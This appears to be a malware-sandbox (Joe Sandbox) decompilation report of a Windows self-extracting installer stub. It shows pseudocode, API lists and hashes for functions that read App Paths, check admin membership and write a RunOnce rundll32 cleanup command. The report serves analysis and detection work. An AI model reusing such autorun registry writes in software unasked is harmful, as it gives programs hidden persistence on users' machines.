                                                                      				char _v268;
                                                                      				char _v269;
                                                                      				CHAR* _v276;
                                                                      				int _v280;
                                                                      				void* _v284;
                                                                      				int _v288;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t23;
                                                                      				intOrPtr _t34;
                                                                      				int _t45;
                                                                      				int* _t50;
                                                                      				CHAR* _t52;
                                                                      				CHAR* _t61;
                                                                      				char* _t62;
                                                                      				int _t63;
                                                                      				CHAR* _t64;
                                                                      				signed int _t65;
                                                                      
                                                                      				_t52 = __ecx;
                                                                      				_t23 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t23 ^ _t65;
                                                                      				_t62 = _a4;
                                                                      				_t50 = 0;
                                                                      				_t61 = __ecx;
                                                                      				_v276 = _t62;
                                                                      				 *((char*)(__ecx)) = 0;
                                                                      				if( *_t62 != 0x23) {
                                                                      					_t63 = 0x104;
                                                                      					goto L14;
                                                                      				} else {
                                                                      					_t64 = _t62 + 1;
                                                                      					_v269 = CharUpperA( *_t64);
                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                      					_t63 = 0x104;
                                                                      					_t34 = _v269;
                                                                      					if(_t34 == 0x53) {
                                                                      						L14:
                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                      						goto L15;
                                                                      					} else {
                                                                      						if(_t34 == 0x57) {
                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                      							goto L16;
                                                                      						} else {
                                                                      							_push(_t52);
                                                                      							_v288 = 0x104;
                                                                      							E00F81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                      							_t59 = 0x104;
                                                                      							E00F8658A( &_v268, 0x104, _v276);
                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                      								L16:
                                                                      								_t59 = _t63;
                                                                      								E00F8658A(_t61, _t63, _v276);
                                                                      							} else {
                                                                      								if(RegQueryValueExA(_v284, 0xf81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                      									_t45 = _v280;
                                                                      									if(_t45 != 2) {
                                                                      										L9:
                                                                      										if(_t45 == 1) {
                                                                      											goto L10;
                                                                      										}
                                                                      									} else {
                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                      											_t45 = _v280;
                                                                      											goto L9;
                                                                      										} else {
                                                                      											_t59 = 0x104;
                                                                      											E00F81680(_t61, 0x104,  &_v268);
                                                                      											L10:
                                                                      											_t50 = 1;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								RegCloseKey(_v284);
                                                                      								L15:
                                                                      								if(_t50 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                      			}


                                                                      APIs
                                                                      • CharUpperA.USER32(644C7055,00000000,00000000,00000000), ref: 00F827A8
                                                                      • CharNextA.USER32(0000054D), ref: 00F827B5
                                                                      • CharNextA.USER32(00000000), ref: 00F827BC
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                      • RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00F828AA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F828B9
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00F827E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                      • API String ID: 2659952014-2428544900
                                                                      • Opcode ID: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                      • Instruction ID: d7b0e3628f32fb5107f536d484f53446f5a43f7ea33ba94c891ab12707549c1b
                                                                      • Opcode Fuzzy Hash: af52a5f68144c05ae8cb9eca2e5313ec7edcc7ee12002e194ddcf87f74c8484e
                                                                      • Instruction Fuzzy Hash: 5F41A571E0012CAFEF64AB649C45AFE77BDEB15710F0440AAF545D2100DB749E86AFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E00F82267() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v836;
                                                                      				void* _v840;
                                                                      				int _v844;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				intOrPtr _t33;
                                                                      				void* _t38;
                                                                      				intOrPtr* _t42;
                                                                      				void* _t45;
                                                                      				void* _t47;
                                                                      				void* _t49;
                                                                      				signed int _t51;
                                                                      
                                                                      				_t19 =  *0xf88004; // 0x644c7055
                                                                      				_t20 = _t19 ^ _t51;
                                                                      				_v8 = _t19 ^ _t51;
                                                                      				if( *0xf88530 != 0) {
                                                                      					_push(_t49);
                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                      						_push(_t38);
                                                                      						_v844 = 0x238;
                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                      							_push(_t47);
                                                                      							memset( &_v268, 0, 0x104);
                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      								E00F8658A( &_v268, 0x104, 0xf81140);
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      							E00F8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                      							_t42 =  &_v836;
                                                                      							_t45 = _t42 + 1;
                                                                      							_pop(_t47);
                                                                      							do {
                                                                      								_t33 =  *_t42;
                                                                      								_t42 = _t42 + 1;
                                                                      							} while (_t33 != 0);
                                                                      							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                      						}
                                                                      						_t20 = RegCloseKey(_v840);
                                                                      						_pop(_t38);
                                                                      					}
                                                                      					_pop(_t49);
                                                                      				}
                                                                      				return E00F86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                      			}




















                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00F822A3
                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00F822D8
                                                                      • memset.MSVCRT ref: 00F822F5
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F82305
                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00F8236E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00F8237A
                                                                      Strings
                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F8232D
                                                                      • wextract_cleanup1, xrefs: 00F8227C, 00F822CD, 00F82363
                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F82299
                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F82321
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                      • API String ID: 3027380567-2048191181
                                                                      • Opcode ID: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                      • Instruction ID: 31250253b458fc3ab86304a07b99c451c071ae6b1201425c2b033351fb44ab4e
                                                                      • Opcode Fuzzy Hash: 500901cec70fe4e95f1d2f1b69edfec912e172d96d2ac7c019fc4f6d56ec277c
                                                                      • Instruction Fuzzy Hash: 9331C571A0021C6BDB21AB50DC49FEA7B7CEB15750F4401AAB50DEA050EA75AB89EB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E00F83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* _t8;
                                                                      				void* _t11;
                                                                      				void* _t15;
                                                                      				struct HWND__* _t16;
                                                                      				struct HWND__* _t33;
                                                                      				struct HWND__* _t34;
                                                                      
                                                                      				_t8 = _a8 - 0xf;
                                                                      				if(_t8 == 0) {
                                                                      					if( *0xf88590 == 0) {
                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                      						 *0xf88590 = 1;
                                                                      					}
                                                                      					L13:
                                                                      					return 0;
                                                                      				}
                                                                      				_t11 = _t8 - 1;
                                                                      				if(_t11 == 0) {
                                                                      					L7:
                                                                      					_push(0);
                                                                      					L8:
                                                                      					EndDialog(_a4, ??);
                                                                      					L9:
                                                                      					return 1;
                                                                      				}
                                                                      				_t15 = _t11 - 0x100;
                                                                      				if(_t15 == 0) {
                                                                      					_t16 = GetDesktopWindow();
                                                                      					_t33 = _a4;
                                                                      					E00F843D0(_t33, _t16);
                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xf88d4c);
                                                                      					SetWindowTextA(_t33, "lenta");
                                                                      					SetForegroundWindow(_t33);
                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                      					 *0xf888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                      					SetWindowLongA(_t34, 0xfffffffc, E00F830C0);
                                                                      					return 1;
                                                                      				}
                                                                      				if(_t15 != 1) {
                                                                      					goto L13;
                                                                      				}
                                                                      				if(_a12 != 6) {
                                                                      					if(_a12 != 7) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L7;
                                                                      				}
                                                                      				_push(1);
                                                                      				goto L8;
                                                                      			}










                                                                      APIs
                                                                      • EndDialog.USER32(?,00000000), ref: 00F8313B
                                                                      • GetDesktopWindow.USER32 ref: 00F8314B
                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 00F8316A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F83176
                                                                      • SetForegroundWindow.USER32(?), ref: 00F8317D
                                                                      • GetDlgItem.USER32(?,00000834), ref: 00F83185
                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00F83190
                                                                      • SetWindowLongA.USER32(00000000,000000FC,00F830C0), ref: 00F831A3
                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00F831CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                      • String ID: lenta
                                                                      • API String ID: 3785188418-2780258678
                                                                      • Opcode ID: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                      • Instruction ID: 9f80be09db7ffeee191898cd68db2de6920b69796e62a89e0ca2e1f9887b5527
                                                                      • Opcode Fuzzy Hash: a7072cb8c7411702f7fbdcc0732567a77d93f923634abdc61bc0a48d0245dfd1
                                                                      • Instruction Fuzzy Hash: C211B431A04619BBEB216F64AC0CBFA3A64FB46F70F100612F815D51F0DB749641FB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00F818A3(void* __edx, void* __esi) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				char _v20;
                                                                      				long _v24;
                                                                      				void* _v28;
                                                                      				void* _v32;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t23;
                                                                      				long _t45;
                                                                      				void* _t49;
                                                                      				int _t50;
                                                                      				void* _t52;
                                                                      				signed int _t53;
                                                                      
                                                                      				_t51 = __esi;
                                                                      				_t49 = __edx;
                                                                      				_t23 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t23 ^ _t53;
                                                                      				_t25 =  *0xf88128; // 0x2
                                                                      				_t45 = 0;
                                                                      				_v12 = 0x500;
                                                                      				_t50 = 2;
                                                                      				_v16.Value = 0;
                                                                      				_v20 = 0;
                                                                      				if(_t25 != _t50) {
                                                                      					L20:
                                                                      					return E00F86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                      				}
                                                                      				if(E00F817EE( &_v20) != 0) {
                                                                      					_t25 = _v20;
                                                                      					if(_v20 != 0) {
                                                                      						 *0xf88128 = 1;
                                                                      					}
                                                                      					goto L20;
                                                                      				}
                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                      					L17:
                                                                      					CloseHandle(_v28);
                                                                      					_t25 = _v20;
                                                                      					goto L20;
                                                                      				} else {
                                                                      					_push(__esi);
                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                      					if(_t52 == 0) {
                                                                      						L16:
                                                                      						_pop(_t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                      						L15:
                                                                      						LocalFree(_t52);
                                                                      						goto L16;
                                                                      					} else {
                                                                      						if( *_t52 <= 0) {
                                                                      							L14:
                                                                      							FreeSid(_v32);
                                                                      							goto L15;
                                                                      						}
                                                                      						_t15 = _t52 + 4; // 0x4
                                                                      						_t50 = _t15;
                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                      							_t45 = _t45 + 1;
                                                                      							_t50 = _t50 + 8;
                                                                      							if(_t45 <  *_t52) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						 *0xf88128 = 1;
                                                                      						_v20 = 1;
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}



















                                                                      APIs
                                                                        • Part of subcall function 00F817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                        • Part of subcall function 00F817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                        • Part of subcall function 00F817EE: AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                        • Part of subcall function 00F817EE: FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                        • Part of subcall function 00F817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00F818EB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00F818F2
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00F8190A
                                                                      • GetLastError.KERNEL32 ref: 00F81918
                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 00F8192C
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00F81944
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F81964
                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00F8197A
                                                                      • FreeSid.ADVAPI32(?), ref: 00F8199C
                                                                      • LocalFree.KERNEL32(00000000), ref: 00F819A3
                                                                      • CloseHandle.KERNEL32(?), ref: 00F819AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                      • String ID:
                                                                      • API String ID: 2168512254-0
                                                                      • Opcode ID: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                      • Instruction ID: 5668ca8bb04facf79600e992d2315e5fe07a90ca33389f38551c9af48e5d7a45
                                                                      • Opcode Fuzzy Hash: 8524a9017b6cce86701870aa89d6d61a0b53c46788eb92c9b3d830699094614c
                                                                      • Instruction Fuzzy Hash: 3D311971E00209EBEB20AFA5DC59AFFBBBCFB04750F10052AE545D2150DB349906EB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00F8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				long _t4;
                                                                      				void* _t11;
                                                                      				CHAR* _t14;
                                                                      				void* _t15;
                                                                      				long _t16;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_t11 = __edx;
                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                      				_t16 = _t4;
                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                      					if(_t16 == 0) {
                                                                      						L5:
                                                                      						return 0;
                                                                      					}
                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                      					FreeResource(_t15);
                                                                      					return _t16;
                                                                      				}
                                                                      				return _t4;
                                                                      			}









                                                                      APIs
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                      • LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                      • memcpy_s.MSVCRT ref: 00F846E5
                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                      • String ID: TITLE$lenta
                                                                      • API String ID: 3370778649-2035842925
                                                                      • Opcode ID: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                      • Instruction ID: 85ad2563db596ea34110a15934639ad1240650705a25ad884ba84c91a5fa9cc9
                                                                      • Opcode Fuzzy Hash: a93137c2b41dd939d9e23fd44a476d501469d30be52240723983e37d3f339cd7
                                                                      • Instruction Fuzzy Hash: A901F9326442097BF32027A55C0CFFB7E2CDBC6F61F080015FA49971C0D9719840A7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 57%
                                                                      			E00F817EE(intOrPtr* __ecx) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				void* _v24;
                                                                      				intOrPtr* _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t14;
                                                                      				_Unknown_base(*)()* _t20;
                                                                      				long _t28;
                                                                      				void* _t35;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				signed int _t38;
                                                                      				intOrPtr* _t39;
                                                                      
                                                                      				_t14 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t14 ^ _t38;
                                                                      				_v12 = 0x500;
                                                                      				_t37 = __ecx;
                                                                      				_v16.Value = 0;
                                                                      				_v28 = __ecx;
                                                                      				_t28 = 0;
                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                      				if(_t36 != 0) {
                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                      					_v20 = _t20;
                                                                      					if(_t20 != 0) {
                                                                      						 *_t37 = 0;
                                                                      						_t28 = 1;
                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                      							_t37 = _t39;
                                                                      							 *0xf8a288(0, _v24, _v28);
                                                                      							_v20();
                                                                      							if(_t39 != _t39) {
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      							FreeSid(_v24);
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t36);
                                                                      				}
                                                                      				return E00F86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                      			}




















                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F818DD), ref: 00F8181A
                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F8182C
                                                                      • AllocateAndInitializeSid.ADVAPI32(00F818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F818DD), ref: 00F81855
                                                                      • FreeSid.ADVAPI32(?,?,?,?,00F818DD), ref: 00F81883
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F818DD), ref: 00F8188A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                      • API String ID: 4204503880-1888249752
                                                                      • Opcode ID: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                      • Instruction ID: b59704a69fe716f9aa49d14166eb9e7d063285a8d20c566dbf5e6ae3ee36b68e
                                                                      • Opcode Fuzzy Hash: b8f16d077d155776bc91a1e7579d35a24282ae2c62bc7348a9d6821702d5d34b
                                                                      • Instruction Fuzzy Hash: 0A116A71E00209AFDB10AFA4DC4AAFEBB7CFF44711F10016AF905E6250DB719D059791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t7;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				int _t22;
                                                                      				struct HWND__* _t24;
                                                                      
                                                                      				_t7 = _a8 - 0x10;
                                                                      				if(_t7 == 0) {
                                                                      					EndDialog(_a4, 2);
                                                                      					L11:
                                                                      					return 1;
                                                                      				}
                                                                      				_t11 = _t7 - 0x100;
                                                                      				if(_t11 == 0) {
                                                                      					_t12 = GetDesktopWindow();
                                                                      					_t24 = _a4;
                                                                      					E00F843D0(_t24, _t12);
                                                                      					SetWindowTextA(_t24, "lenta");
                                                                      					SetDlgItemTextA(_t24, 0x838,  *0xf89404);
                                                                      					SetForegroundWindow(_t24);
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t11 == 1) {
                                                                      					_t22 = _a12;
                                                                      					if(_t22 < 6) {
                                                                      						goto L11;
                                                                      					}
                                                                      					if(_t22 <= 7) {
                                                                      						L8:
                                                                      						EndDialog(_a4, _t22);
                                                                      						return 1;
                                                                      					}
                                                                      					if(_t22 != 0x839) {
                                                                      						goto L11;
                                                                      					}
                                                                      					 *0xf891dc = 1;
                                                                      					goto L8;
                                                                      				}
                                                                      				return 0;
                                                                      			}









                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 00F83490
                                                                      • GetDesktopWindow.USER32 ref: 00F8349A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F834B2
                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 00F834C4
                                                                      • SetForegroundWindow.USER32(?), ref: 00F834CB
                                                                      • EndDialog.USER32(?,00000002), ref: 00F834D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                      • String ID: lenta
                                                                      • API String ID: 852535152-2780258678
                                                                      • Opcode ID: 643472a08c522f5abda10d25bd833a1da242c41b87e3505aeb41fb45cac7f958
                                                                      • Instruction ID: 3a4c848608eb3baff4ff59ed4fddf151d20713878418aa0db3f8dd6fc642cad3
